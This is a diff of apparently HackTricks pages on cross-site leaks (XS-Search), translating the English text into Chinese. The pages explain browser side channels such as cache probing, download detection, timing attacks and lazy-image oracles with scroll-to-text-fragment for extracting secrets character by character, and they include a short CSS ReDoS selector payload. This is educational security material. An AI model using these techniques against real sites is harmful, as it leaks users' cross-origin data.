 - **Code Example**: [https://xsleaks.dev/docs/attacks/element-leaks/](https://xsleaks.dev/docs/attacks/element-leaks/), [https://xsinator.com/testing.html#Media%20Dimensions%20Leak](https://xsinator.com/testing.html#Media%20Dimensions%20Leak), [https://xsinator.com/testing.html#Media%20Duration%20Leak](https://xsinator.com/testing.html#Media%20Duration%20Leak)
 
-Information leakage through HTML elements is a concern in web security, particularly when dynamic media files are generated based on user information, or when watermarks are added, altering the media size. This can be exploited by attackers to differentiate between possible states by analyzing the information exposed by certain HTML elements.
+通过 HTML 元素的信息泄露是网络安全中的一个问题，特别是当动态媒体文件基于用户信息生成时，或者当添加水印时，改变媒体大小。攻击者可以利用这一点，通过分析某些 HTML 元素暴露的信息来区分可能的状态。
 
 ### Information Exposed by HTML Elements
 
-- **HTMLMediaElement**: This element reveals the media's `duration` and `buffered` times, which can be accessed via its API. [Read more about HTMLMediaElement](https://developer.mozilla.org/en-US/docs/Web/API/HTMLMediaElement)
-- **HTMLVideoElement**: It exposes `videoHeight` and `videoWidth`. In some browsers, additional properties like `webkitVideoDecodedByteCount`, `webkitAudioDecodedByteCount`, and `webkitDecodedFrameCount` are available, offering more in-depth information about the media content. [Read more about HTMLVideoElement](https://developer.mozilla.org/en-US/docs/Web/API/HTMLVideoElement)
-- **getVideoPlaybackQuality()**: This function provides details about video playback quality, including `totalVideoFrames`, which can indicate the amount of video data processed. [Read more about getVideoPlaybackQuality()](https://developer.mozilla.org/en-US/docs/Web/API/VideoPlaybackQuality)
-- **HTMLImageElement**: This element leaks the `height` and `width` of an image. However, if an image is invalid, these properties will return 0, and the `image.decode()` function will be rejected, indicating the failure to load the image properly. [Read more about HTMLImageElement](https://developer.mozilla.org/en-US/docs/Web/API/HTMLImageElement)
+- **HTMLMediaElement**: 该元素揭示媒体的 `duration` 和 `buffered` 时间，可以通过其 API 访问。[Read more about HTMLMediaElement](https://developer.mozilla.org/en-US/docs/Web/API/HTMLMediaElement)
+- **HTMLVideoElement**: 它暴露 `videoHeight` 和 `videoWidth`。在某些浏览器中，额外的属性如 `webkitVideoDecodedByteCount`、`webkitAudioDecodedByteCount` 和 `webkitDecodedFrameCount` 可用，提供有关媒体内容的更深入信息。[Read more about HTMLVideoElement](https://developer.mozilla.org/en-US/docs/Web/API/HTMLVideoElement)
+- **getVideoPlaybackQuality()**: 此函数提供有关视频播放质量的详细信息，包括 `totalVideoFrames`，这可以指示处理的视频数据量。[Read more about getVideoPlaybackQuality()](https://developer.mozilla.org/en-US/docs/Web/API/VideoPlaybackQuality)
+- **HTMLImageElement**: 该元素泄露图像的 `height` 和 `width`。但是，如果图像无效，这些属性将返回 0，并且 `image.decode()` 函数将被拒绝，指示未能正确加载图像。[Read more about HTMLImageElement](https://developer.mozilla.org/en-US/docs/Web/API/HTMLImageElement)
 
 ### CSS Property
 
 - **Inclusion Methods**: HTML Elements
-- **Detectable Difference**: Page Content
+- **Detectable Difference**: 页面内容
 - **More info**: [https://xsleaks.dev/docs/attacks/element-leaks/#abusing-getcomputedstyle](https://xsleaks.dev/docs/attacks/element-leaks/#abusing-getcomputedstyle), [https://scarybeastsecurity.blogspot.com/2008/08/cross-domain-leaks-of-site-logins.html](https://scarybeastsecurity.blogspot.com/2008/08/cross-domain-leaks-of-site-logins.html)
-- **Summary:** Identify variations in website styling that correlate with the user's state or status.
+- **Summary:** 识别与用户状态或身份相关的网站样式变化。
 - **Code Example**: [https://xsinator.com/testing.html#CSS%20Property%20Leak](https://xsinator.com/testing.html#CSS%20Property%20Leak)
 
-Web applications may change w**ebsite styling depending on the status of the use**. Cross-origin CSS files can be embedded on the attacker page with the **HTML link element**, and the **rules** will be **applied** to the attacker page. If a page dynamically changes these rules, an attacker can **detect** these **differences** depending on the user state.\
-As a leak technique, the attacker can use the `window.getComputedStyle` method to **read CSS** properties of a specific HTML element. As a result, an attacker can read arbitrary CSS properties if the affected element and property name is known.
+Web 应用程序可能会根据用户的状态更改 **网站样式**。跨域 CSS 文件可以通过 **HTML link 元素** 嵌入到攻击者页面中，**规则** 将被 **应用** 到攻击者页面。如果页面动态更改这些规则，攻击者可以根据用户状态 **检测** 这些 **差异**。\
+作为一种泄露技术，攻击者可以使用 `window.getComputedStyle` 方法来 **读取特定 HTML 元素的 CSS** 属性。因此，如果已知受影响的元素和属性名称，攻击者可以读取任意 CSS 属性。
 
 ### CSS History
 
 - **Inclusion Methods**: HTML Elements
-- **Detectable Difference**: Page Content
+- **Detectable Difference**: 页面内容
 - **More info**: [https://xsleaks.dev/docs/attacks/css-tricks/#retrieving-users-history](https://xsleaks.dev/docs/attacks/css-tricks/#retrieving-users-history)
-- **Summary:** Detect if the `:visited` style is applied to an URL indicating it was already visited
+- **Summary:** 检测 `:visited` 样式是否应用于 URL，指示其已被访问
 - **Code Example**: [http://blog.bawolff.net/2021/10/write-up-pbctf-2021-vault.html](http://blog.bawolff.net/2021/10/write-up-pbctf-2021-vault.html)
 
 > [!NOTE]
-> According to [**this**](https://blog.huli.tw/2022/05/05/en/angstrom-ctf-2022-writeup-en/), this is not working in headless Chrome.
+> 根据 [**this**](https://blog.huli.tw/2022/05/05/en/angstrom-ctf-2022-writeup-en/)，在无头 Chrome 中此方法无效。
 
-The CSS `:visited` selector is utilized to style URLs differently if they have been previously visited by the user. In the past, the `getComputedStyle()` method could be employed to identify these style differences. However, modern browsers have implemented security measures to prevent this method from revealing the state of a link. These measures include always returning the computed style as if the link were visited and restricting the styles that can be applied with the `:visited` selector.
+CSS `:visited` 选择器用于对用户之前访问过的 URL 进行不同的样式处理。过去，可以使用 `getComputedStyle()` 方法来识别这些样式差异。然而，现代浏览器已实施安全措施，以防止此方法泄露链接的状态。这些措施包括始终返回计算样式，仿佛链接已被访问，并限制可以使用 `:visited` 选择器应用的样式。
 
-Despite these restrictions, it's possible to discern the visited state of a link indirectly. One technique involves tricking the user into interacting with an area affected by CSS, specifically utilizing the `mix-blend-mode` property. This property allows the blending of elements with their background, potentially revealing the visited state based on user interaction.
+尽管有这些限制，但可以间接识别链接的访问状态。一种技术涉及诱使用户与受 CSS 影响的区域进行交互，特别是利用 `mix-blend-mode` 属性。该属性允许元素与其背景混合，可能根据用户交互揭示访问状态。
 
-Furthermore, detection can be achieved without user interaction by exploiting the rendering timings of links. Since browsers may render visited and unvisited links differently, this can introduce a measurable time difference in rendering. A proof of concept (PoC) was mentioned in a Chromium bug report, demonstrating this technique using multiple links to amplify the timing difference, thereby making the visited state detectable through timing analysis.
+此外，可以通过利用链接的渲染时间来实现无用户交互的检测。由于浏览器可能以不同方式渲染已访问和未访问的链接，这可能在渲染中引入可测量的时间差异。在 Chromium 错误报告中提到了一种概念验证（PoC），演示了使用多个链接来放大时间差异，从而通过时间分析使访问状态可检测。
 
-For further details on these properties and methods, visit their documentation pages:
+有关这些属性和方法的更多详细信息，请访问其文档页面：
 
 - `:visited`: [MDN Documentation](https://developer.mozilla.org/en-US/docs/Web/CSS/:visited)
 - `getComputedStyle()`: [MDN Documentation](https://developer.mozilla.org/en-US/docs/Web/API/Window/getComputedStyle)
@@ -760,56 +752,56 @@ For further details on these properties and methods, visit their documentation p
 - **Inclusion Methods**: Frames
 - **Detectable Difference**: Headers
 - **More info**: [https://www.ndss-symposium.org/wp-content/uploads/2020/02/24278-paper.pdf](https://www.ndss-symposium.org/wp-content/uploads/2020/02/24278-paper.pdf)
-- **Summary:** In Google Chrome, a dedicated error page is displayed when a page is blocked from being embedded on a cross-origin site due to X-Frame-Options restrictions.
+- **Summary:** 在 Google Chrome 中，当由于 X-Frame-Options 限制而阻止页面嵌入跨域站点时，会显示专用错误页面。
 - **Code Example**: [https://xsinator.com/testing.html#ContentDocument%20X-Frame%20Leak](https://xsinator.com/testing.html#ContentDocument%20X-Frame%20Leak)
 
-In Chrome, if a page with the `X-Frame-Options` header set to "deny" or "same-origin" is embedded as an object, an error page appears. Chrome uniquely returns an empty document object (instead of `null`) for the `contentDocument` property of this object, unlike in iframes or other browsers. Attackers could exploit this by detecting the empty document, potentially revealing information about the user's state, especially if developers inconsistently set the X-Frame-Options header, often overlooking error pages. Awareness and consistent application of security headers are crucial for preventing such leaks.
+在 Chrome 中，如果一个带有 `X-Frame-Options` 头设置为 "deny" 或 "same-origin" 的页面作为对象嵌入，则会出现错误页面。Chrome 独特地为该对象的 `contentDocument` 属性返回一个空文档对象（而不是 `null`），这与在 iframe 或其他浏览器中的表现不同。攻击者可以通过检测空文档来利用这一点，可能揭示用户状态的信息，特别是如果开发人员不一致地设置 X-Frame-Options 头，通常会忽略错误页面。意识到并一致应用安全头对于防止此类泄露至关重要。
 
 ### Download Detection
 
 - **Inclusion Methods**: Frames, Pop-ups
 - **Detectable Difference**: Headers
 - **More info**: [https://xsleaks.dev/docs/attacks/navigations/#download-trigger](https://xsleaks.dev/docs/attacks/navigations/#download-trigger)
-- **Summary:** An attacker can discern file downloads by leveraging iframes; continued accessibility of the iframe implies successful file download.
+- **Summary:** 攻击者可以通过利用 iframes 来识别文件下载；iframe 的持续可访问性意味着文件下载成功。
 - **Code Example**: [https://xsleaks.dev/docs/attacks/navigations/#download-bar](https://xsleaks.dev/docs/attacks/navigations/#download-bar)
 
-The `Content-Disposition` header, specifically `Content-Disposition: attachment`, instructs the browser to download content rather than display it inline. This behavior can be exploited to detect whether a user has access to a page that triggers a file download. In Chromium-based browsers, there are a few techniques to detect this download behavior:
+`Content-Disposition` 头，特别是 `Content-Disposition: attachment`，指示浏览器下载内容而不是内联显示。这种行为可以被利用来检测用户是否可以访问触发文件下载的页面。在基于 Chromium 的浏览器中，有几种技术可以检测这种下载行为：
 
-1. **Download Bar Monitoring**:
-   - When a file is downloaded in Chromium-based browsers, a download bar appears at the bottom of the browser window.
-   - By monitoring changes in the window height, attackers can infer the appearance of the download bar, suggesting that a download has been initiated.
-2. **Download Navigation with Iframes**:
-   - When a page triggers a file download using the `Content-Disposition: attachment` header, it does not cause a navigation event.
-   - By loading the content in an iframe and monitoring for navigation events, it's possible to check if the content disposition causes a file download (no navigation) or not.
-3. **Download Navigation without Iframes**:
-   - Similar to the iframe technique, this method involves using `window.open` instead of an iframe.
-   - Monitoring navigation events in the newly opened window can reveal whether a file download was triggered (no navigation) or if the content is displayed inline (navigation occurs).
+1. **下载栏监控**：
+- 当文件在基于 Chromium 的浏览器中下载时，下载栏会出现在浏览器窗口底部。
+- 通过监控窗口高度的变化，攻击者可以推断下载栏的出现，表明下载已启动。
+2. **使用 Iframes 的下载导航**：
+- 当页面使用 `Content-Disposition: attachment` 头触发文件下载时，它不会导致导航事件。
+- 通过在 iframe 中加载内容并监控导航事件，可以检查内容处置是否导致文件下载（无导航）或不是。
+3. **不使用 Iframes 的下载导航**：
+- 与 iframe 技术类似，此方法涉及使用 `window.open` 而不是 iframe。
+- 监控新打开窗口中的导航事件可以揭示是否触发了文件下载（无导航）或内容是否内联显示（发生导航）。
 
-In scenarios where only logged-in users can trigger such downloads, these techniques can be used to indirectly infer the user's authentication state based on the browser's response to the download request.
+在只有登录用户可以触发此类下载的情况下，这些技术可以用来间接推断用户的身份验证状态，基于浏览器对下载请求的响应。
 
 ### Partitioned HTTP Cache Bypass <a href="#partitioned-http-cache-bypass" id="partitioned-http-cache-bypass"></a>
 
 - **Inclusion Methods**: Pop-ups
 - **Detectable Difference**: Timing
 - **More info**: [https://xsleaks.dev/docs/attacks/navigations/#partitioned-http-cache-bypass](https://xsleaks.dev/docs/attacks/navigations/#partitioned-http-cache-bypass)
-- **Summary:** An attacker can discern file downloads by leveraging iframes; continued accessibility of the iframe implies successful file download.
-- **Code Example**: [https://xsleaks.dev/docs/attacks/navigations/#partitioned-http-cache-bypass](https://xsleaks.dev/docs/attacks/navigations/#partitioned-http-cache-bypass), [https://gist.github.com/aszx87410/e369f595edbd0f25ada61a8eb6325722](https://gist.github.com/aszx87410/e369f595edbd0f25ada61a8eb6325722) (from [https://blog.huli.tw/2022/05/05/en/angstrom-ctf-2022-writeup-en/](https://blog.huli.tw/2022/05/05/en/angstrom-ctf-2022-writeup-en/))
+- **Summary:** 攻击者可以通过利用 iframes 来识别文件下载；iframe 的持续可访问性意味着文件下载成功。
+- **Code Example**: [https://xsleaks.dev/docs/attacks/navigations/#partitioned-http-cache-bypass](https://xsleaks.dev/docs/attacks/navigations/#partitioned-http-cache-bypass), [https://gist.github.com/aszx87410/e369f595edbd0f25ada61a8eb6325722](https://gist.github.com/aszx87410/e369f595edbd0f25ada61a8eb6325722) (来自 [https://blog.huli.tw/2022/05/05/en/angstrom-ctf-2022-writeup-en/](https://blog.huli.tw/2022/05/05/en/angstrom-ctf-2022-writeup-en/))
 
 > [!WARNING]
-> This is why this technique is interesting: Chrome now has **cache partitioning**, and the cache key of the newly opened page is: `(https://actf.co, https://actf.co, https://sustenance.web.actf.co/?m =xxx)`, but if I open an ngrok page and use fetch in it, the cache key will be: `(https://myip.ngrok.io, https://myip.ngrok.io, https://sustenance.web.actf.co/?m=xxx)`, the **cache key is different**, so the cache cannot be shared. You can find more detail here: [Gaining security and privacy by partitioning the cache](https://developer.chrome.com/blog/http-cache-partitioning/)\
-> (Comment from [**here**](https://blog.huli.tw/2022/05/05/en/angstrom-ctf-2022-writeup-en/))
+> 这就是为什么这个技术很有趣：Chrome 现在有 **缓存分区**，新打开页面的缓存键是：`(https://actf.co, https://actf.co, https://sustenance.web.actf.co/?m =xxx)`，但如果我打开一个 ngrok 页面并在其中使用 fetch，缓存键将是：`(https://myip.ngrok.io, https://myip.ngrok.io, https://sustenance.web.actf.co/?m=xxx)`，**缓存键是不同的**，因此缓存不能共享。您可以在这里找到更多细节：[通过分区缓存获得安全性和隐私](https://developer.chrome.com/blog/http-cache-partitioning/)\
+> （来自 [**here**](https://blog.huli.tw/2022/05/05/en/angstrom-ctf-2022-writeup-en/) 的评论）
 
-If a site `example.com` includes a resource from `*.example.com/resource` then that resource will have the **same caching key** as if the resource was directly **requested through top-level navigation**. That is because the caching key is consisted of top-level _eTLD+1_ and frame _eTLD+1_.
+如果一个站点 `example.com` 包含来自 `*.example.com/resource` 的资源，那么该资源将具有与通过顶级导航直接 **请求** 该资源相同的 **缓存键**。这是因为缓存键由顶级 _eTLD+1_ 和框架 _eTLD+1_ 组成。
 
-Because accessing the cache is faster than loading a resource, it's possible to try to change the location of a page and cancel it 20ms (for example) after. If the origin was changed after the stop, it means that the resource was cached.\
-Or could just **send some fetch to the pontentially cached page and measure the time it takes**.
+因为访问缓存比加载资源更快，所以可以尝试更改页面的位置并在 20 毫秒（例如）后取消它。如果在停止后更改了源，则意味着资源已被缓存。\
+或者可以 **发送一些 fetch 到潜在缓存页面并测量所需时间**。
 
 ### Manual Redirect <a href="#fetch-with-abortcontroller" id="fetch-with-abortcontroller"></a>
 
 - **Inclusion Methods**: Fetch API
 - **Detectable Difference**: Redirects
 - **More info**: [ttps://docs.google.com/presentation/d/1rlnxXUYHY9CHgCMckZsCGH4VopLo4DYMvAcOltma0og/edit#slide=id.gae7bf0b4f7_0_1234](https://docs.google.com/presentation/d/1rlnxXUYHY9CHgCMckZsCGH4VopLo4DYMvAcOltma0og/edit#slide=id.gae7bf0b4f7_0_1234)
-- **Summary:** It's possible to find out if a response to a fetch request is a redirect
+- **Summary:** 可以找出 fetch 请求的响应是否为重定向
 - **Code Example**:
 
 ![](<../images/image (652).png>)
@@ -819,61 +811,61 @@ Or could just **send some fetch to the pontentially cached page and measure the
 - **Inclusion Methods**: Fetch API
 - **Detectable Difference**: Timing
 - **More info**: [https://xsleaks.dev/docs/attacks/cache-probing/#fetch-with-abortcontroller](https://xsleaks.dev/docs/attacks/cache-probing/#fetch-with-abortcontroller)
-- **Summary:** It's possible to try to load a resource and about before it's loaded the loading is interrupted. Depending on if an error is triggered, the resource was or wasn't cached.
+- **Summary:** 可以尝试加载资源并在加载之前中断加载。根据是否触发错误，资源可能已被缓存或未被缓存。
 - **Code Example**: [https://xsleaks.dev/docs/attacks/cache-probing/#fetch-with-abortcontroller](https://xsleaks.dev/docs/attacks/cache-probing/#fetch-with-abortcontroller)
 
-Use _**fetch**_ and _**setTimeout**_ with an **AbortController** to both detect whether the **resource is cached** and to evict a specific resource from the browser cache. Moreover, the process occurs without caching new content.
+使用 _**fetch**_ 和 _**setTimeout**_ 结合 **AbortController** 来检测 **资源是否被缓存** 并将特定资源从浏览器缓存中驱逐。此外，该过程在不缓存新内容的情况下进行。
 
 ### Script Pollution
 
 - **Inclusion Methods**: HTML Elements (script)
-- **Detectable Difference**: Page Content
+- **Detectable Difference**: 页面内容
 - **More info**: [https://xsleaks.dev/docs/attacks/element-leaks/#script-tag](https://xsleaks.dev/docs/attacks/element-leaks/#script-tag)
-- **Summary:** It's possible to **overwrite built-in functions** and read their arguments which even from **cross-origin script** (which cannot be read directly), this might **leak valuable information**.
+- **Summary:** 可以 **覆盖内置函数** 并读取其参数，即使是来自 **跨域脚本**（无法直接读取），这可能 **泄露有价值的信息**。
 - **Code Example**: [https://xsleaks.dev/docs/attacks/element-leaks/#script-tag](https://xsleaks.dev/docs/attacks/element-leaks/#script-tag)
 
 ### Service Workers <a href="#service-workers" id="service-workers"></a>
 
 - **Inclusion Methods**: Pop-ups
-- **Detectable Difference**: Page Content
+- **Detectable Difference**: 页面内容
 - **More info**: [https://xsleaks.dev/docs/attacks/timing-attacks/execution-timing/#service-workers](https://xsleaks.dev/docs/attacks/timing-attacks/execution-timing/#service-workers)
-- **Summary:** Measure execution time of a web using service workers.
+- **Summary:** 测量使用服务工作者的网页的执行时间。
 - **Code Example**:
 
-In the given scenario, the attacker takes the initiative to register a **service worker** within one of their domains, specifically "attacker.com". Next, the attacker opens a new window in the target website from the main document and instructs the **service worker** to commence a timer. As the new window begins to load, the attacker navigates the reference obtained in the previous step to a page managed by the **service worker**.
+在给定的场景中，攻击者主动在其域名之一 "attacker.com" 中注册一个 **服务工作者**。接下来，攻击者从主文档中在目标网站打开一个新窗口，并指示 **服务工作者** 开始计时。当新窗口开始加载时，攻击者将前一步获得的引用导航到由 **服务工作者** 管理的页面。
 
-Upon arrival of the request initiated in the preceding step, the **service worker** responds with a **204 (No Content)** status code, effectively terminating the navigation process. At this point, the **service worker** captures a measurement from the timer initiated earlier in step two. This measurement is influenced by the duration of JavaScript causing delays in the navigation process.
+在前一步发起的请求到达时，**服务工作者** 以 **204 (No Content)** 状态码响应，有效地终止导航过程。此时，**服务工作者** 捕获从第二步开始的计时器的测量。该测量受 JavaScript 导致的导航过程延迟的影响。
 
 > [!WARNING]
-> In an execution timing it's possible to **eliminate** **network factors** to obtain **more precise measurements**. For example, by loading the resources used by the page before loading it.
+> 在执行计时中，可以 **消除** **网络因素** 以获得 **更精确的测量**。例如，通过在加载页面之前加载页面使用的资源。
 
 ### Fetch Timing
 
 - **Inclusion Methods**: Fetch API
-- **Detectable Difference**: Timing (generally due to Page Content, Status Code)
+- **Detectable Difference**: Timing (通常由于页面内容、状态码)
 - **More info**: [https://xsleaks.dev/docs/attacks/timing-attacks/network-timing/#modern-web-timing-attacks](https://xsleaks.dev/docs/attacks/timing-attacks/network-timing/#modern-web-timing-attacks)
-- **Summary:** Use [performance.now()](https://xsleaks.dev/docs/attacks/timing-attacks/clocks/#performancenow) to measure the time it takes to perform a request. Other clocks could be used.
+- **Summary:** 使用 [performance.now()](https://xsleaks.dev/docs/attacks/timing-attacks/clocks/#performancenow) 测量执行请求所需的时间。可以使用其他时钟。
 - **Code Example**: [https://xsleaks.dev/docs/attacks/timing-attacks/network-timing/#modern-web-timing-attacks](https://xsleaks.dev/docs/attacks/timing-attacks/network-timing/#modern-web-timing-attacks)
 
 ### Cross-Window Timing
 
 - **Inclusion Methods**: Pop-ups
-- **Detectable Difference**: Timing (generally due to Page Content, Status Code)
+- **Detectable Difference**: Timing (通常由于页面内容、状态码)
 - **More info**: [https://xsleaks.dev/docs/attacks/timing-attacks/network-timing/#cross-window-timing-attacks](https://xsleaks.dev/docs/attacks/timing-attacks/network-timing/#cross-window-timing-attacks)
-- **Summary:** se [performance.now()](https://xsleaks.dev/docs/attacks/timing-attacks/clocks/#performancenow) to measure the time it takes to perform a request using `window.open`. Other clocks could be used.
+- **Summary:** 使用 [performance.now()](https://xsleaks.dev/docs/attacks/timing-attacks/clocks/#performancenow) 测量使用 `window.open` 执行请求所需的时间。可以使用其他时钟。
 - **Code Example**: [https://xsleaks.dev/docs/attacks/timing-attacks/network-timing/#cross-window-timing-attacks](https://xsleaks.dev/docs/attacks/timing-attacks/network-timing/#cross-window-timing-attacks)
 
 <figure><img src="../images/image (3) (1) (1) (1) (1) (1) (1).png" alt=""><figcaption></figcaption></figure>
 
 \
-Use [**Trickest**](https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\
-Get Access Today:
+使用 [**Trickest**](https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks) 轻松构建和 **自动化工作流**，由世界上 **最先进** 的社区工具提供支持。\
+立即获取访问权限：
 
 {% embed url="https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks" %}
 
 ## With HTML or Re Injection
 
-Here you can find techniques to exfiltrate information from a cross-origin HTML **injecting HTML content**. These techniques are interesting in cases where for any reason you can **inject HTML but you cannot inject JS code**.
+在这里，您可以找到从跨域 HTML **注入 HTML 内容** 中提取信息的技术。这些技术在您可以 **注入 HTML 但无法注入 JS 代码** 的情况下很有趣。
 
 ### Dangling Markup
 
@@ -883,39 +875,35 @@ dangling-markup-html-scriptless-injection/
 
 ### Image Lazy Loading
 
-If you need to **exfiltrate content** and you can **add HTML previous to the secret** you should check the **common dangling markup techniques**.\
-However, if for whatever reason you **MUST** do it **char by char** (maybe the communication is via a cache hit) you can use this trick.
-
-**Images** in HTML has a "**loading**" attribute whose value can be "**lazy**". In that case, the image will be loaded when it's viewed and not while the page is loading:
+如果您需要 **提取内容** 并且可以 **在秘密之前添加 HTML**，您应该检查 **常见的悬挂标记技术**。\
+但是，如果出于某种原因您 **必须** 逐字符进行（也许通信是通过缓存命中），您可以使用这个技巧。
 
+**图像** 在 HTML 中具有一个 "**loading**" 属性，其值可以是 "**lazy**"。在这种情况下，图像将在查看时加载，而不是在页面加载时：
 ```html
 <img src=/something loading=lazy >
 ```
+因此，您可以做的是**添加大量垃圾字符**（例如**成千上万的"W"**）来**填充网页在秘密之前，或者添加类似**`<br><canvas height="1850px"></canvas><br>`**的内容。**\
+然后，如果例如我们的**注入出现在标志之前**，**图像**将被**加载**，但如果出现在**标志之后**，标志 + 垃圾将**阻止其加载**（您需要调整放置多少垃圾）。这就是在[**这篇文章**](https://blog.huli.tw/2022/10/08/en/sekaictf2022-safelist-and-connection/)中发生的事情。
 
-Therefore, what you can do is to **add a lot of junk chars** (For example **thousands of "W"s**) to **fill the web page before the secret or add something like** `<br><canvas height="1850px"></canvas><br>.`\
-Then if for example our **injection appear before the flag**, the **image** would be **loaded**, but if appears **after** the **flag**, the flag + the junk will **prevent it from being loaded** (you will need to play with how much junk to place). This is what happened in [**this writeup**](https://blog.huli.tw/2022/10/08/en/sekaictf2022-safelist-and-connection/).
-
-Another option would be to use the **scroll-to-text-fragment** if allowed:
+另一个选项是使用**scroll-to-text-fragment**（如果允许的话）：
 
 #### Scroll-to-text-fragment
 
-However, you make the **bot access the page** with something like
-
+但是，您让**机器人访问页面**时使用类似
 ```
 #:~:text=SECR
 ```
+所以网页将类似于：**`https://victim.com/post.html#:~:text=SECR`**
 
-So the web page will be something like: **`https://victim.com/post.html#:~:text=SECR`**
+其中 post.html 包含攻击者的垃圾字符和懒加载图像，然后添加机器人的秘密。
 
-Where post.html contains the attacker junk chars and lazy load image and then the secret of the bot is added.
+这段文本的作用是让机器人访问页面中包含文本 `SECR` 的任何文本。由于该文本是秘密，并且它就在 **图像下方**，因此 **只有在猜测的秘密正确时，图像才会加载**。所以你就有了你的神谕来 **逐字符提取秘密**。
 
-What this text will do is to make the bot access any text in the page that contains the text `SECR`. As that text is the secret and it's just **below the image**, the **image will only load if the guessed secret is correct**. So there you have your oracle to **exfiltrate the secret char by char**.
+一些利用此漏洞的代码示例：[https://gist.github.com/jorgectf/993d02bdadb5313f48cf1dc92a7af87e](https://gist.github.com/jorgectf/993d02bdadb5313f48cf1dc92a7af87e)
 
-Some code example to exploit this: [https://gist.github.com/jorgectf/993d02bdadb5313f48cf1dc92a7af87e](https://gist.github.com/jorgectf/993d02bdadb5313f48cf1dc92a7af87e)
+### 基于图像懒加载时间
 
-### Image Lazy Loading Time Based
-
-If it's **not possible to load an external image** that could indicate the attacker that the image was loaded, another option would be to try to **guess the char several times and measure that**. If the image is loaded all the requests would take longer that if the image isn't loaded. This is what was used in the [**solution of this writeup**](https://blog.huli.tw/2022/10/08/en/sekaictf2022-safelist-and-connection/) **sumarized here:**
+如果 **无法加载外部图像**，这可能会向攻击者指示图像已加载，另一种选择是尝试 **多次猜测字符并测量**。如果图像已加载，所有请求的时间将比图像未加载时更长。这就是在 [**此写作的解决方案中**](https://blog.huli.tw/2022/10/08/en/sekaictf2022-safelist-and-connection/) **总结的内容：**
 
 {{#ref}}
 xs-search/event-loop-blocking-+-lazy-images.md
@@ -929,25 +917,23 @@ regular-expression-denial-of-service-redos.md
 
 ### CSS ReDoS
 
-If `jQuery(location.hash)` is used, it's possible to find out via timing i**f some HTML content exists**, this is because if the selector `main[id='site-main']` doesn't match it doesn't need to check the rest of the **selectors**:
-
+如果使用 `jQuery(location.hash)`，可以通过时间判断 **是否存在某些 HTML 内容**，这是因为如果选择器 `main[id='site-main']` 不匹配，则不需要检查其余的 **选择器**：
 ```javascript
 $(
-  "*:has(*:has(*:has(*)) *:has(*:has(*:has(*))) *:has(*:has(*:has(*)))) main[id='site-main']"
+"*:has(*:has(*:has(*)) *:has(*:has(*:has(*))) *:has(*:has(*:has(*)))) main[id='site-main']"
 )
 ```
-
-### CSS Injection
+### CSS 注入
 
 {{#ref}}
 xs-search/css-injection/
 {{#endref}}
 
-## Defenses
+## 防御
 
-There are mitigations recommended in [https://xsinator.com/paper.pdf](https://xsinator.com/paper.pdf) also in each section of the wiki [https://xsleaks.dev/](https://xsleaks.dev/). Take a look there for more information about how to protect against these techniques.
+在 [https://xsinator.com/paper.pdf](https://xsinator.com/paper.pdf) 和维基的每个部分 [https://xsleaks.dev/](https://xsleaks.dev/) 中推荐了一些缓解措施。请查看那里以获取有关如何防止这些技术的更多信息。
 
-## References
+## 参考
 
 - [https://xsinator.com/paper.pdf](https://xsinator.com/paper.pdf)
 - [https://xsleaks.dev/](https://xsleaks.dev)
@@ -960,8 +946,7 @@ There are mitigations recommended in [https://xsinator.com/paper.pdf](https://xs
 <figure><img src="../images/image (3) (1) (1) (1) (1) (1) (1).png" alt=""><figcaption></figcaption></figure>
 
 \
-Use [**Trickest**](https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\
-Get Access Today:
+使用 [**Trickest**](https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks) 轻松构建和 **自动化工作流程**，由世界上 **最先进** 的社区工具提供支持。\
+今天就获取访问权限： 
 
 {% embed url="https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks" %}
-
diff --git a/src/pentesting-web/xs-search/README.md b/src/pentesting-web/xs-search/README.md
index ccd4e1822..d79c16741 100644
--- a/src/pentesting-web/xs-search/README.md
+++ b/src/pentesting-web/xs-search/README.md
@@ -2,177 +2,173 @@
 
 <figure><img src="../../images/image (48).png" alt=""><figcaption></figcaption></figure>
 
-Use [\*\*\*\*](https://trickest.com/?utm_source=hacktricks&utm_medium=text&utm_campaign=ppc&utm_content=xs-search) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\
-Get Access Today:
+使用 [\*\*\*\*](https://trickest.com/?utm_source=hacktricks&utm_medium=text&utm_campaign=ppc&utm_content=xs-search) 轻松构建和 **自动化工作流程**，由世界上 **最先进** 的社区工具提供支持。\
+立即获取访问权限：
 
 {% embed url="https://trickest.com/?utm_source=hacktricks&utm_medium=banner&utm_campaign=ppc&utm_content=xs-search" %}
 
 {{#include ../../banners/hacktricks-training.md}}
 
-## Basic Information
+## 基本信息
 
-XS-Search is a method used for **extracting cross-origin information** by leveraging **side channel vulnerabilities**.
+XS-Search 是一种通过利用 **侧信道漏洞** 来 **提取跨源信息** 的方法。
 
-Key components involved in this attack include:
+此攻击涉及的关键组件包括：
 
-- **Vulnerable Web**: The target website from which information is intended to be extracted.
-- **Attacker's Web**: The malicious website created by the attacker, which the victim visits, hosting the exploit.
-- **Inclusion Method**: The technique employed to incorporate the Vulnerable Web into the Attacker's Web (e.g., window.open, iframe, fetch, HTML tag with href, etc.).
-- **Leak Technique**: Techniques used to discern differences in the state of the Vulnerable Web based on information gathered through the inclusion method.
-- **States**: The two potential conditions of the Vulnerable Web, which the attacker aims to distinguish.
-- **Detectable Differences**: Observable variations that the attacker relies on to infer the state of the Vulnerable Web.
+- **易受攻击的网络**：目标网站，信息旨在从中提取。
+- **攻击者的网络**：攻击者创建的恶意网站，受害者访问，托管漏洞。
+- **包含方法**：用于将易受攻击的网络纳入攻击者网络的技术（例如，window.open、iframe、fetch、带有 href 的 HTML 标签等）。
+- **泄漏技术**：用于根据通过包含方法收集的信息来辨别易受攻击的网络状态差异的技术。
+- **状态**：易受攻击的网络的两种潜在条件，攻击者旨在区分。
+- **可检测差异**：攻击者依赖于可观察的变化来推断易受攻击的网络状态。
 
-### Detectable Differences
+### 可检测差异
 
-Several aspects can be analyzed to differentiate the states of the Vulnerable Web:
